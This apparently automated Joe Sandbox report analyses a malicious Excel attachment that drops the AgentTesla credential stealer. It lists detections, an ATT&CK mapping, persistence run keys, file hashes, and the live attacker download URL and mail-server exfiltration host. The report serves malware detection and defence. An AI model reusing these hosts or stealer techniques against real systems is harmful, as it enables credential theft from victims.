                      Source: Yara matchFile source: 00000009.00000002.2366705481.0000000002161000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: vbc.exe PID: 1980, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: tnvLnx.exe PID: 152, type: MEMORY

                      Remote Access Functionality:

                      barindex
                      Yara detected AgentTeslaShow sources
                      Source: Yara matchFile source: 00000007.00000002.2242803026.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000002.2366293471.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000002.2222286152.0000000003409000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.2366050589.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.2155416176.0000000003409000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.2243257481.0000000003329000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 4.2.vbc.exe.3553848.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.2.tnvLnx.exe.3553848.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.tnvLnx.exe.400000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.tnvLnx.exe.3473848.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.tnvLnx.exe.400000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.tnvLnx.exe.3473848.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.2.tnvLnx.exe.3553848.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.vbc.exe.3553848.4.raw.unpack, type: UNPACKEDPE
                      Yara detected AgentTeslaShow sources
                      Source: Yara matchFile source: 00000007.00000002.2242803026.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000002.2366293471.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.2367132534.0000000002821000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.2243225346.0000000002351000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000002.2222286152.0000000003409000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.2366050589.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.2367095229.00000000027E2000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.2366999584.0000000002741000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.2155416176.0000000003409000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000002.2366705481.0000000002161000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.2243257481.0000000003329000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: tnvLnx.exe PID: 1664, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: vbc.exe PID: 2908, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: vbc.exe PID: 1980, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: tnvLnx.exe PID: 152, type: MEMORY
                      Source: Yara matchFile source: 4.2.vbc.exe.3553848.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.2.tnvLnx.exe.3553848.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.tnvLnx.exe.400000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.tnvLnx.exe.3473848.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.tnvLnx.exe.400000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.tnvLnx.exe.3473848.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.2.tnvLnx.exe.3553848.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.vbc.exe.3553848.4.raw.unpack, type: UNPACKEDPE

                      Mitre Att&ck Matrix

                      Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                      Valid AccountsWindows Management Instrumentation211Registry Run Keys / Startup Folder1Extra Window Memory Injection1Disable or Modify Tools11OS Credential Dumping2File and Directory Discovery1Remote ServicesArchive Collected Data11Exfiltration Over Other Network MediumIngress Tool Transfer12Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                      Default AccountsExploitation for Client Execution13Boot or Logon Initialization ScriptsProcess Injection112Deobfuscate/Decode Files or Information1Credentials in Registry1System Information Discovery114Remote Desktop ProtocolData from Local System2Exfiltration Over BluetoothEncrypted Channel1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                      Domain AccountsAt (Linux)Logon Script (Windows)Registry Run Keys / Startup Folder1Obfuscated Files or Information21Security Account ManagerSecurity Software Discovery211SMB/Windows Admin SharesEmail Collection1Automated ExfiltrationNon-Standard Port1Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                      Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Software Packing2NTDSProcess Discovery2Distributed Component Object ModelInput CaptureScheduled TransferNon-Application Layer Protocol2SIM Card SwapCarrier Billing Fraud
                      Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptExtra Window Memory Injection1LSA SecretsVirtualization/Sandbox Evasion131SSHKeyloggingData Transfer Size LimitsApplication Layer Protocol32Manipulate Device CommunicationManipulate App Store Rankings or Ratings
                      Replication Through Removable MediaLaunchdRc.commonRc.commonMasquerading111Cached Domain CredentialsApplication Window Discovery1VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                      External Remote ServicesScheduled TaskStartup ItemsStartup ItemsVirtualization/Sandbox Evasion131DCSyncRemote System Discovery1Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                      Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobProcess Injection112Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
                      Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Hidden Files and Directories1/etc/passwd and /etc/shadowSystem Network Connections DiscoverySoftware Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction

                      Behavior Graph

                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet
                      behaviorgraph top1 signatures2 2 Behavior Graph ID: 435321 Sample: AGG POWER RFQ.xlsx Startdate: 16/06/2021 Architecture: WINDOWS Score: 100 42 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->42 44 Found malware configuration 2->44 46 Multi AV Scanner detection for submitted file 2->46 48 13 other signatures 2->48 7 EQNEDT32.EXE 12 2->7         started        12 tnvLnx.exe 2->12         started        14 tnvLnx.exe 2->14         started        16 EXCEL.EXE 38 37 2->16         started        process3 dnsIp4 38 192.3.141.146, 49165, 80 AS-COLOCROSSINGUS United States 7->38 30 C:\Users\user\AppData\Local\...\vbc[1].exe, PE32 7->30 dropped 32 C:\Users\Public\vbc.exe, PE32 7->32 dropped 56 Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802) 7->56 18 vbc.exe 7->18         started        58 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 12->58 60 Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines) 12->60 62 Injects a PE file into a foreign processes 12->62 21 tnvLnx.exe 2 12->21         started        23 tnvLnx.exe 2 14->23         started        34 C:\Users\user\Desktop\~$AGG POWER RFQ.xlsx, data 16->34 dropped file5 signatures6 process7 signatures8 50 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 18->50 52 Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines) 18->52 54 Injects a PE file into a foreign processes 18->54 25 vbc.exe 1 12 18->25         started        process9 dnsIp10 40 mail.alkhaleejautoparts.com 148.66.138.106, 49166, 49167, 587 AS-26496-GO-DADDY-COM-LLCUS Singapore 25->40 36 C:\Users\user\AppData\Roaming\...\tnvLnx.exe, PE32 25->36 dropped 64 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 25->64 66 Tries to steal Mail credentials (via file access) 25->66 68 Tries to harvest and steal ftp login credentials 25->68 70 2 other signatures 25->70 file11 signatures12

                      Screenshots

                      Thumbnails

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.

                      windows-stand

                      Antivirus, Machine Learning and Genetic Malware Detection

                      Initial Sample

                      SourceDetectionScannerLabelLink
                      AGG POWER RFQ.xlsx28%VirustotalBrowse
                      AGG POWER RFQ.xlsx22%ReversingLabsDocument-OLE.Exploit.CVE-2018-0802

                      Dropped Files

                      No Antivirus matches

                      Unpacked PE Files

                      SourceDetectionScannerLabelLinkDownload
                      5.2.vbc.exe.400000.0.unpack100%AviraHEUR/AGEN.1138205Download File
                      7.2.tnvLnx.exe.400000.1.unpack100%AviraHEUR/AGEN.1138205Download File
                      9.2.tnvLnx.exe.400000.2.unpack100%AviraHEUR/AGEN.1138205Download File

                      Domains

                      No Antivirus matches

                      URLs

                      SourceDetectionScannerLabelLink
                      http://127.0.0.1:HTTP/1.10%Avira URL Cloudsafe
                      http://DynDns.comDynDNS0%URL Reputationsafe
                      http://DynDns.comDynDNS0%URL Reputationsafe
                      http://DynDns.comDynDNS0%URL Reputationsafe
                      http://192.3.141.146/win/vbc.exe0%Avira URL Cloudsafe
                      https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha0%URL Reputationsafe
                      https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha0%URL Reputationsafe
                      https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha0%URL Reputationsafe
                      http://DTHLcG.com0%Avira URL Cloudsafe
                      https://api.ipify.org%GETMozilla/5.00%URL Reputationsafe
                      https://api.ipify.org%GETMozilla/5.00%URL Reputationsafe
                      https://api.ipify.org%GETMozilla/5.00%URL Reputationsafe
                      http://www.%s.comPA0%URL Reputationsafe
                      http://www.%s.comPA0%URL Reputationsafe
                      http://www.%s.comPA0%URL Reputationsafe
                      http://gN3yhO7qZ2vk1Dl2x8.com0%Avira URL Cloudsafe
                      https://api.ipify.org%0%URL Reputationsafe
                      https://api.ipify.org%0%URL Reputationsafe
                      https://api.ipify.org%0%URL Reputationsafe
                      https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip0%URL Reputationsafe
                      https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip0%URL Reputationsafe
                      https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip0%URL Reputationsafe
                      http://mail.alkhaleejautoparts.com0%Avira URL Cloudsafe

                      Domains and IPs

                      Contacted Domains

                      NameIPActiveMaliciousAntivirus DetectionReputation
                      mail.alkhaleejautoparts.com
                      		148.66.138.106
                      		truetrue
                        		unknown

                        Contacted URLs

                        NameMaliciousAntivirus DetectionReputation
                        http://192.3.141.146/win/vbc.exetrue
                        • Avira URL Cloud: safe
                        		unknown

                        URLs from Memory and Binaries

                        NameSourceMaliciousAntivirus DetectionReputation
                        http://127.0.0.1:HTTP/1.1vbc.exe, 00000005.00000002.2366999584.0000000002741000.00000004.00000001.sdmp, tnvLnx.exe, 00000007.00000002.2243225346.0000000002351000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        		low
                        http://DynDns.comDynDNStnvLnx.exe, 00000007.00000002.2243225346.0000000002351000.00000004.00000001.sdmpfalse
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        		unknown
                        http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.vbc.exe, 00000005.00000002.2371482883.00000000060C0000.00000002.00000001.sdmp, tnvLnx.exe, 00000007.00000002.2244518505.0000000005B50000.00000002.00000001.sdmpfalse
                          		high
                          https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%havbc.exe, 00000005.00000002.2366999584.0000000002741000.00000004.00000001.sdmp, tnvLnx.exe, 00000007.00000002.2243225346.0000000002351000.00000004.00000001.sdmpfalse
                          • URL Reputation: safe
                          • URL Reputation: safe
                          • URL Reputation: safe
                          		unknown
                          http://DTHLcG.comtnvLnx.exe, 00000007.00000002.2243225346.0000000002351000.00000004.00000001.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://api.ipify.org%GETMozilla/5.0tnvLnx.exe, 00000007.00000002.2243225346.0000000002351000.00000004.00000001.sdmpfalse
                          • URL Reputation: safe
                          • URL Reputation: safe
                          • URL Reputation: safe
                          		low
                          http://www.%s.comPAvbc.exe, 00000005.00000002.2371482883.00000000060C0000.00000002.00000001.sdmp, tnvLnx.exe, 00000007.00000002.2244518505.0000000005B50000.00000002.00000001.sdmpfalse
                          • URL Reputation: safe
                          • URL Reputation: safe
                          • URL Reputation: safe
                          		low
                          http://gN3yhO7qZ2vk1Dl2x8.comvbc.exe, 00000005.00000002.2367132534.0000000002821000.00000004.00000001.sdmp, vbc.exe, 00000005.00000002.2367250713.0000000002894000.00000004.00000001.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://github.com/georgw777/MediaManagertnvLnx.exefalse
                            		high
                            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namevbc.exe, 00000004.00000002.2155151223.0000000002401000.00000004.00000001.sdmp, tnvLnx.exe, 00000006.00000002.2221949010.0000000002401000.00000004.00000001.sdmpfalse
                              		high
                              https://api.ipify.org%vbc.exe, 00000005.00000002.2367072067.00000000027C8000.00000004.00000001.sdmpfalse
                              • URL Reputation: safe
                              • URL Reputation: safe
                              • URL Reputation: safe
                              		low
                              https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zipvbc.exe, 00000004.00000002.2155416176.0000000003409000.00000004.00000001.sdmp, vbc.exe, 00000005.00000002.2366050589.0000000000402000.00000040.00000001.sdmp, tnvLnx.exe, 00000006.00000002.2222286152.0000000003409000.00000004.00000001.sdmp, tnvLnx.exe, 00000007.00000002.2242803026.0000000000402000.00000040.00000001.sdmpfalse
                              • URL Reputation: safe
                              • URL Reputation: safe
                              • URL Reputation: safe
                              		unknown
                              https://stackpath.bootstrapcdn.com/bootstrap/4.5.0/css/bootstrap.min.cssvbc.exe, 00000004.00000002.2155176869.0000000002426000.00000004.00000001.sdmp, tnvLnx.exe, 00000006.00000002.2221988672.0000000002426000.00000004.00000001.sdmp, tnvLnx.exe, 00000008.00000002.2242859365.0000000002346000.00000004.00000001.sdmpfalse
                                		high
                                https://github.com/georgw777/tnvLnx.exefalse
                                  		high
                                  https://github.com/georgw777/MediaManager;https://github.com/georgw777/vbc.exe, 00000004.00000000.2148405134.0000000000AD2000.00000020.00020000.sdmp, vbc.exe, 00000005.00000002.2366734790.0000000000AD2000.00000020.00020000.sdmp, tnvLnx.exe, 00000006.00000002.2221233725.0000000000212000.00000020.00020000.sdmp, tnvLnx.exe, 00000007.00000000.2220311506.0000000000212000.00000020.00020000.sdmp, tnvLnx.exe, 00000008.00000000.2234165130.0000000000212000.00000020.00020000.sdmpfalse
                                    		high
                                    http://mail.alkhaleejautoparts.comvbc.exe, 00000005.00000002.2367334115.00000000028BB000.00000004.00000001.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown

                                    Contacted IPs

                                    • No. of IPs < 25%
                                    • 25% < No. of IPs < 50%
                                    • 50% < No. of IPs < 75%
                                    • 75% < No. of IPs

                                    Public

                                    IPDomainCountryFlagASNASN NameMalicious
                                    148.66.138.106
                                    		mail.alkhaleejautoparts.comSingapore
                                    		26496AS-26496-GO-DADDY-COM-LLCUStrue
                                    192.3.141.146
                                    		unknownUnited States
                                    		36352AS-COLOCROSSINGUStrue

                                    General Information

                                    Joe Sandbox Version:32.0.0 Black Diamond
                                    Analysis ID:435321
                                    Start date:16.06.2021
                                    Start time:12:16:24
                                    Joe Sandbox Product:CloudBasic
                                    Overall analysis duration:0h 10m 44s
                                    Hypervisor based Inspection enabled:false
                                    Report type:light
                                    Sample file name:AGG POWER RFQ.xlsx
                                    Cookbook file name:defaultwindowsofficecookbook.jbs
                                    Analysis system description:Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                                    Number of analysed new started processes analysed:10
                                    Number of new started drivers analysed:0
                                    Number of existing processes analysed:0
                                    Number of existing drivers analysed:0
                                    Number of injected processes analysed:0
                                    Technologies:
                                    • HCA enabled
                                    • EGA enabled
                                    • HDC enabled
                                    • AMSI enabled
                                    Analysis Mode:default
                                    Analysis stop reason:Timeout
                                    Detection:MAL
                                    Classification:mal100.troj.spyw.expl.evad.winXLSX@12/22@7/2
                                    EGA Information:Failed
                                    HDC Information:
                                    • Successful, ratio: 2.5% (good quality ratio 2.1%)
                                    • Quality average: 60.5%
                                    • Quality standard deviation: 33.8%
                                    HCA Information:
                                    • Successful, ratio: 93%
                                    • Number of executed functions: 0
                                    • Number of non-executed functions: 0
                                    Cookbook Comments:
                                    • Adjust boot time
                                    • Enable AMSI
                                    • Found application associated with file extension: .xlsx
                                    • Found Word or Excel or PowerPoint or XPS Viewer
                                    • Attach to Office via COM
                                    • Scroll down
                                    • Close Viewer
                                    Warnings:
                                    Show All
                                    • Exclude process from analysis (whitelisted): dllhost.exe
                                    • TCP Packets have been reduced to 100
                                    • Report size exceeded maximum capacity and may have missing behavior information.
                                    • Report size getting too big, too many NtCreateFile calls found.
                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                    • Report size getting too big, too many NtQueryAttributesFile calls found.
                                    • Report size getting too big, too many NtQueryValueKey calls found.

                                    Simulations

                                    Behavior and APIs

                                    TimeTypeDescription
                                    12:21:06API Interceptor77x Sleep call for process: EQNEDT32.EXE modified
                                    12:21:09API Interceptor941x Sleep call for process: vbc.exe modified
                                    12:21:32AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run tnvLnx C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exe
                                    12:21:41API Interceptor710x Sleep call for process: tnvLnx.exe modified
                                    12:21:41AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run tnvLnx C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exe

                                    Joe Sandbox View / Context

                                    IPs

                                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                    148.66.138.106Statement of Account.exeGet hashmaliciousBrowse
                                      Dv3nvr3mMaDxvbv.exeGet hashmaliciousBrowse
                                        NEW Quotation.exeGet hashmaliciousBrowse
                                          JEB2dgkadl.exeGet hashmaliciousBrowse
                                            Invoice.exeGet hashmaliciousBrowse
                                              SOA.exeGet hashmaliciousBrowse
                                                NEW UPDATED SOA.exeGet hashmaliciousBrowse
                                                  Quotation.exeGet hashmaliciousBrowse
                                                    NEW PURCHASE ORDER .exe.exeGet hashmaliciousBrowse
                                                      FEB SOA.exeGet hashmaliciousBrowse
                                                        INVOICE.exeGet hashmaliciousBrowse
                                                          SOA.exeGet hashmaliciousBrowse
                                                            statement of account.exeGet hashmaliciousBrowse
                                                              INVOICE.exeGet hashmaliciousBrowse
                                                                Bank Account details.exeGet hashmaliciousBrowse
                                                                  payment details.exeGet hashmaliciousBrowse

                                                                    Domains

                                                                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                    mail.alkhaleejautoparts.comDv3nvr3mMaDxvbv.exeGet hashmaliciousBrowse
                                                                    • 148.66.138.106

                                                                    ASN

                                                                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                    AS-COLOCROSSINGUSRequest for Quotation (RFQ).xlsxGet hashmaliciousBrowse
                                                                    • 192.227.228.121
                                                                    INQUIRY for IFM 20207.xlsxGet hashmaliciousBrowse
                                                                    • 192.227.158.74
                                                                    Citibank Payment Advice.xlsxGet hashmaliciousBrowse
                                                                    • 192.227.158.111
                                                                    Tax Document.docxGet hashmaliciousBrowse
                                                                    • 198.12.107.38
                                                                    Order Specification.docxGet hashmaliciousBrowse
                                                                    • 192.3.141.164
                                                                    pNsKDtmW1R.exeGet hashmaliciousBrowse
                                                                    • 192.210.198.12
                                                                    Du1H1Py8wy.exeGet hashmaliciousBrowse
                                                                    • 192.210.198.12
                                                                    vbc.xlsxGet hashmaliciousBrowse
                                                                    • 107.173.219.35
                                                                    yiEfe07buY.exeGet hashmaliciousBrowse
                                                                    • 192.210.198.12
                                                                    LjbPCz3fpH.exeGet hashmaliciousBrowse
                                                                    • 192.210.198.12
                                                                    cdmo7vIyjC.exeGet hashmaliciousBrowse
                                                                    • 198.12.127.155
                                                                    Proforma Invoice.xlsxGet hashmaliciousBrowse
                                                                    • 198.12.127.155
                                                                    e#U03c2.xlsxGet hashmaliciousBrowse
                                                                    • 192.227.228.121
                                                                    SX-L21182 #U9ece#U5df4#U5ae9EST new order.xlsxGet hashmaliciousBrowse
                                                                    • 192.227.158.72
                                                                    OYlyw8sDsH.exeGet hashmaliciousBrowse
                                                                    • 192.210.198.12
                                                                    AvPRRB6bZr.exeGet hashmaliciousBrowse
                                                                    • 192.210.198.12
                                                                    PO 1032123 - 1032503.xlsxGet hashmaliciousBrowse
                                                                    • 192.210.173.40
                                                                    Policy reminder.xlsxGet hashmaliciousBrowse
                                                                    • 198.12.110.183
                                                                    Swift_Payment.MT103.docxGet hashmaliciousBrowse
                                                                    • 192.3.141.164
                                                                    24PURcXCp6.exeGet hashmaliciousBrowse
                                                                    • 192.210.198.12
                                                                    AS-26496-GO-DADDY-COM-LLCUSSupplier order data sheet For June Delivery PO 4500101880.exeGet hashmaliciousBrowse
                                                                    • 64.202.184.79
                                                                    Statement of Account.exeGet hashmaliciousBrowse
                                                                    • 148.66.138.106
                                                                    gz7dLhKlSQ.exeGet hashmaliciousBrowse
                                                                    • 184.168.131.241
                                                                    ekeson and sons.exeGet hashmaliciousBrowse
                                                                    • 166.62.28.135
                                                                    jZuCbIpwNX.exeGet hashmaliciousBrowse
                                                                    • 184.168.131.241
                                                                    KK71rkO0Tf.exeGet hashmaliciousBrowse
                                                                    • 107.180.41.236
                                                                    LEMO.exeGet hashmaliciousBrowse
                                                                    • 184.168.131.241
                                                                    Enquiry (OUR REF #162620321) (OUR REF # 166060421) Taylor Marine Project.exeGet hashmaliciousBrowse
                                                                    • 184.168.131.241
                                                                    JUN14 OUTSTANDING CONTRACT ORDER-01.xlsxGet hashmaliciousBrowse
                                                                    • 192.169.223.13
                                                                    Dv3nvr3mMaDxvbv.exeGet hashmaliciousBrowse
                                                                    • 148.66.138.106
                                                                    RFQ.exeGet hashmaliciousBrowse
                                                                    • 198.71.232.3
                                                                    SecuriteInfo.com.Trojan.DownLoader.origin.7477.dllGet hashmaliciousBrowse
                                                                    • 184.168.131.241
                                                                    Wire_receipt.exeGet hashmaliciousBrowse
                                                                    • 184.168.131.241
                                                                    New_Order.xllGet hashmaliciousBrowse
                                                                    • 184.168.131.241
                                                                    Shipping Doc578.exeGet hashmaliciousBrowse
                                                                    • 184.168.131.241
                                                                    AWB 6299764041.exeGet hashmaliciousBrowse
                                                                    • 184.168.131.241
                                                                    PR#28201909R1.exeGet hashmaliciousBrowse
                                                                    • 184.168.131.241
                                                                    Products inquiry list 06619.exeGet hashmaliciousBrowse
                                                                    • 50.62.160.230
                                                                    invoice#56432_Pdf.exeGet hashmaliciousBrowse
                                                                    • 166.62.10.181
                                                                    Purchase_Order.exeGet hashmaliciousBrowse
                                                                    • 184.168.131.241

                                                                    JA3 Fingerprints

                                                                    No context

                                                                    Dropped Files

                                                                    No context

                                                                    Created / dropped Files

                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe
                                                                    Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                    Category:downloaded
                                                                    Size (bytes):1120768
                                                                    Entropy (8bit):7.255968902164593
                                                                    Encrypted:false
                                                                    SSDEEP:12288:njjwxQMYvquwaHpLN39wfDM5prFXcZl+w5PTK787vEtC0pEyXEiyV4Gq:gxGquPHpLN39wfg5piR9KI7IiyUiyD
                                                                    MD5:42520170FE48AF70B3711BF86BDE77B0
                                                                    SHA1:8AF1983ADFF968D63D210145629F12EDBB4D1292
                                                                    SHA-256:E4FCC9753E14EBA1107DA53046098456E353EFDD9F81D88BD7199CC262E43E64
                                                                    SHA-512:29A865325E7E7708E4CFFD1AD5DBAC134D34D3AB1A369177E445F8FD12F2DAAD039AFDEEA0DA38C49B9323F3934404CA379FC7823EFBF431ED7136FC57907980
                                                                    Malicious:true
                                                                    Reputation:low
                                                                    IE Cache URL:http://192.3.141.146/win/vbc.exe
                                                                    Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...]..`............................>.... ........@.. ....................................@....................................K............................`....................................................... ............... ..H............text...D.... ...................... ..`.rsrc...............................@..@.reloc.......`......................@..B................ .......H........'...............+...|..........................................j+.&.(....(....(.....o....*..0..........+.&.+.&.(....(....9....& ....8g.....(.... .....:U...&..(.... ....(....:>...&..(.... ....8,.....(.... .....9....&..(....82... ............E........................t...........8....& ....8....*.V+.&..(....(....(....*..V+.&..(....(....(....*...+.&..*..+.&..*.J+.&.........(....*.J+.&.........(....*.J+.&.........(....*.J+.&.........(....*..+.&..(....*:+.&.....o"...*.J+.&
                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\1F51718A.png
                                                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                    File Type:PNG image data, 399 x 605, 8-bit/color RGBA, non-interlaced
                                                                    Category:dropped
                                                                    Size (bytes):50311
                                                                    Entropy (8bit):7.960958863022709
                                                                    Encrypted:false
                                                                    SSDEEP:768:hfo72tRlBZeeRugjj8yooVAK92SYAD0PSsX35SVFN0t3HcoNz8WEK6Hm8bbxXVGx:hf0WBueSoVAKxLD06w35SEVNz8im0AEH
                                                                    MD5:4141C7515CE64FED13BE6D2BA33299AA
                                                                    SHA1:B290F533537A734B7030CE1269AC8C5398754194
                                                                    SHA-256:F6B0FE628E1469769E6BD3660611B078CEF6EE396F693361B1B42A9100973B75
                                                                    SHA-512:74E9927BF0C6F8CB9C3973FD68DAD12B422DC4358D5CCED956BC6A20139B21D929E47165F77D208698924CB7950A7D5132953C75770E4A357580BF271BD9BD88
                                                                    Malicious:false
                                                                    Reputation:moderate, very likely benign file
                                                                    Preview: .PNG........IHDR.......].......^....gAMA......a.....sRGB........ cHRM..z&..............u0...`..:....p..Q<....bKGD..............oFFs.......F.#-nT....pHYs...%...%.IR$.....vpAg.......0...O.....IDATx...h.w....V!...D.........4.p .X(r..x.&..K.(.L...P..d5.R......b.......C...BP...,% ....qL.,.!E.ni..t......H._......G..|~=.....<..#.J!.N.a..a.Q.V...t:.M.v;=..0.s..ixa...0..<...`..a\..a..q.+..a..5.<..a...`..a\..a..q.+..a..5.<..a...`..a\..a..q.+..a..5.<..a...`..a\..a..q.+..a..5.<..a...`..a\..a..q.+..a..5.<..a...`..a\..a..q.+..a..5.<..a...`..a\..a..q.+..a..5.<..a...`..a\..a..q.+..a..5.<..a...`..a\..a..qM../.u....h6..|.22..g4M.........C.u..y,--..'....a.?~.W.\i.>7q.j..y....iLNN.....5\..w"..b~~...J.sssm.d.Y.u.G....s.\..R.`qq.....C;..$..&..2..x..J..fgg...]=g.Y.y..N..(SN.S8.eZ.T...=....4.?~..uK.;....SSS...iY.Q.n.I.u\.x..o.,.av.N.(..H..B..X......... ..amm...h4.t:..].j..tz[.(..#..}yy./..".z.-[!4....a...jj......,dY.7.|.F.....\.~.g.....x..Y...R..\.....w.\.h..K....h..nM
                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\20D9C003.jpeg
                                                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                    File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 191x263, frames 3
                                                                    Category:dropped
                                                                    Size (bytes):8815
                                                                    Entropy (8bit):7.944898651451431
                                                                    Encrypted:false
